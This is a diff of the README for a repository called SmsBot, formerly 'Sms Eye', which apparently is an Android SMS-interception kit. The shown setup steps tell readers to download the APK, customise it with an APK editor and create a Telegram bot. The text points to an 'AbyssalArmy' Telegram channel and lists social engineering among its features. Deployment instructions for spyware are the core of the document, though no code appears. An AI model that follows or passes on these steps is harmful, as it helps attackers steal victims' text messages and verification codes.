alvinbaby/SmsBot/README.md

 - social engineering

 ## Setup
-#### 1 - Download Sms Eye APK
+#### 1 - Download Sms Bot APK
-Download Sms Eye APK file, you can download file from this repository or download it from our [Telegram channel](https://t.me/AbyssalArmy).
+Download Sms Bot APK file, you can download file from this repository or download it from our [Telegram channel](https://t.me/AbyssalArmy).
 #### 2 - Downlaod Apk Editor
 Download the APK Editor to customize the Sms Eye application, you can download Apk Editor from our [Telegram channel](https://t.me/AbyssalArmy).
 #### 3 - Create Telegram bot